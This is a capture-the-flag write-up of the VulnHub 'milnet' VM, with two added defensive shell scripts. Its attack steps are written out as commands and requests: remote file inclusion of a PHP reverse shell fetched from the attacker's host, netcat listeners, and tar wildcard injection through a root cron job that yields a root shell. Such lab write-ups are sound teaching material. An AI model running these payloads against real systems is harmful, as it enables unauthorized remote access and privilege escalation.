Nmap scan result:
Nmap scan report for 192.168.0.109
Host is up, received arp-response (0.00048s latency).
Scanned at 2016-06-17 22:09:01 CST for 36s
Not shown: 998 closed ports
Reason: 998 resets
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 00:0C:29:E7:D8:D2 (VMware)
Limited Shell
This machine is running a simple http server on port 80. These files were found after scanning with dirbuster:
File found: /index.php - 200
File found: /content.php - 200
File found: /main.php - 200
File found: /info.php - 200
File found: /bomb.php - 200
File found: /props.php - 200
Apart from info.php, which showed the output of phpinfo(), there was nothing useful on the other pages. But something caught my eye: content.php returned exactly the same content as main.php, so I decided to examine it more closely with Burp Suite.
POST /content.php HTTP/1.1
Host: 192.168.0.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.2.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.0.109/nav.php
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
route=main
When I clicked the ‘Main’ button, it triggered a POST to content.php with the parameter route=main, and the ‘Bomb’ and ‘Props’ buttons did the same.
This looked like a possible File Inclusion vulnerability. First I tried Local File Inclusion. Relative path traversal did reach files, e.g. route=../../../../../var/www/html/main, but all I could include were files with a .php extension (the application evidently appends it). Appending a ‘%00’ null byte did not help.
Next I tried to include a reverse shell from my machine.
POST /content.php HTTP/1.1
Host: 192.168.0.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.2.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.0.109/nav.php
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
route=http://192.168.0.105/php-reverse-shell.txt?
The appended .php can be bypassed by putting a ‘?’ at the end of the URL, so the extension lands in the query string of the request to my server instead of in the path. And this time I got a shell back on my machine.
# nc -lvp 6666
listening on [any] 6666 ...
192.168.0.109: inverse host lookup failed: Unknown host
connect to [192.168.0.105] from (UNKNOWN) [192.168.0.109] 50118
Linux seckenheim.net.mil 4.4.0-22-generic #40-Ubuntu SMP Thu May 12 22:03:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
16:42:41 up 6:39, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
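The remote include above only works when PHP's allow_url_include directive is On (which in turn requires allow_url_fopen). As an added defender-side check, not part of the original write-up, this script reads those directives out of a php.ini-style file the way PHP does (‘;’ comments ignored, last assignment wins); the sample ini content is constructed here.

```shell
#!/bin/sh
# Added example, not from the original write-up: a defender-side check for the
# php.ini conditions that route=http://... inclusion needs. include() of an
# http:// URL only works when allow_url_include is On, and that directive in
# turn requires allow_url_fopen to be On.

# ini_value FILE DIRECTIVE -> prints the effective value of DIRECTIVE: text
# after ';' is a comment and, as in php.ini, the last assignment wins.
ini_value() {
    sed -n -e 's/;.*$//' -e "s/^[[:space:]]*$2[[:space:]]*=[[:space:]]*//p" "$1" \
        | tail -n 1 | sed 's/[[:space:]]*$//'
}

# is_on VALUE -> 0 for the spellings PHP accepts as true for a boolean directive.
is_on() {
    case "$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')" in
        on|1|true|yes) return 0 ;;
        *) return 1 ;;
    esac
}

# rfi_exposed FILE -> 0 when the ini file permits include() of remote URLs.
rfi_exposed() {
    is_on "$(ini_value "$1" allow_url_fopen)" && is_on "$(ini_value "$1" allow_url_include)"
}

# Constructed sample: the commented-out line and the first Off do not count.
sample=$(mktemp)
cat > "$sample" <<'EOF'
; allow_url_include = Off
allow_url_fopen = On
allow_url_include = Off
allow_url_include = On   ; last assignment wins
EOF
if rfi_exposed "$sample"; then
    echo "remote include possible: allow_url_include=$(ini_value "$sample" allow_url_include)"
else
    echo "remote include blocked"
fi
rm -f "$sample"
```

On a live host the loaded configuration is what counts, so confirm with `php -r 'var_dump(ini_get("allow_url_include"));'` rather than trusting a file on disk.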
Privilege Escalation
After doing some enumeration, I found a suspicious cron job in /etc/crontab.
$ cat /etc/crontab
---snip---
# m h dom mon dow user command
*/1 * * * * root /backup/backup.sh
---snip---
And here’s what backup.sh does:
#!/bin/bash
cd /var/www/html
tar cf /backup/backup.tgz *
It uses tar to archive the whole /var/www/html/ directory every minute.
And here comes the wildcard exploit again. We did this before while working on PIPE, and the same technique escalates us to root here.
This time I’ll use the php command to launch another PHP reverse shell.
On milnet:
$ cd /var/www/html
$ echo > --checkpoint=1
$ echo > --checkpoint-action=exec=sh\ shell.sh
$ wget http://192.168.0.105/php-reverse-shell.txt -O prs.php
--2016-06-18 18:12:37-- http://192.168.0.105/php-reverse-shell.txt
Connecting to 192.168.0.105:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5495 (5.4K) [text/plain]
Saving to: 'prs.php'
0K ..... 100% 875M=0s
2016-06-18 18:12:37 (875 MB/s) - 'prs.php' saved [5495/5495]
$ sed -i s/6666/8888/g prs.php
$ echo 'php prs.php &' > shell.sh
$ chmod +x shell.sh
When backup.sh is triggered, a root shell pops on our listener.
===
# nc -lvp 8888
listening on [any] 8888 ...
192.168.0.109: inverse host lookup failed: Unknown host
connect to [192.168.0.105] from (UNKNOWN) [192.168.0.109] 36284
Linux seckenheim.net.mil 4.4.0-22-generic #40-Ubuntu SMP Thu May 12 22:03:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
15:14:02 up 5:10, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# cat /root/credits.txt
(ASCII art banner)
This was milnet for #vulnhub by @teh_warriar
I hope you enjoyed this vm!
If you liked it drop me a line on twitter or in #vulnhub.
I hope you found the clue:
/home/langman/SDINET/DefenseCode_Unix_WildCards_Gone_Wild.txt
I was sitting on the idea for using this technique for a BOOT2ROOT VM prives for a long time...
This VM was inspired by The Cuckoo's Egg.
If you have not read it give it a try:
http://www.amazon.com/Cuckoos-Egg-Tracking-Computer-Espionage/dp/1416507787/
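The backup.sh cron job above is the root cause: ‘*’ expands to whatever names www-data can create in the web root, and tar reads names beginning with ‘-’ as options. As an added example, not from the original write-up or the milnet VM, here is a small audit for such names plus the hardened form of the backup command; the scratch directory and its contents are constructed here.

```shell
#!/bin/sh
# Added example, not from the original write-up or the milnet VM: two
# defender-side pieces for the backup.sh cron job. option_like_names audits a
# directory for entries that tar's '*' expansion would turn into options;
# safe_backup is the hardened form of the cron command.

# option_like_names DIR -> prints the names of entries directly under DIR
# that begin with '-'. A web root writable by www-data should have none.
option_like_names() {
    find "$1" -mindepth 1 -maxdepth 1 -name '-*' -print | sed 's:.*/::'
}

# safe_backup SRC_DIR ARCHIVE -> archives the contents of SRC_DIR.
# -C enters the directory and '.' names the tree, so the shell never expands
# a wildcard and no filename can reach tar's option parser.
# (The original 'cd DIR; tar cf ARCHIVE *' is what the write-up exploits.)
safe_backup() {
    tar -cf "$2" -C "$1" .
}

# Constructed demo input: a scratch directory carrying the two names from the
# write-up, plus a harmless script they point at (it only creates a marker).
demo_dir=$(mktemp -d)
: > "$demo_dir/--checkpoint=1"
: > "$demo_dir/--checkpoint-action=exec=sh shell.sh"
printf 'touch "%s/marker"\n' "$demo_dir" > "$demo_dir/shell.sh"
echo "option-like names in $demo_dir:"
option_like_names "$demo_dir"
safe_backup "$demo_dir" "$demo_dir.tgz"
if [ -e "$demo_dir/marker" ]; then
    echo "checkpoint action ran"
else
    echo "checkpoint action did not run"
fi
rm -rf "$demo_dir" "$demo_dir.tgz"
```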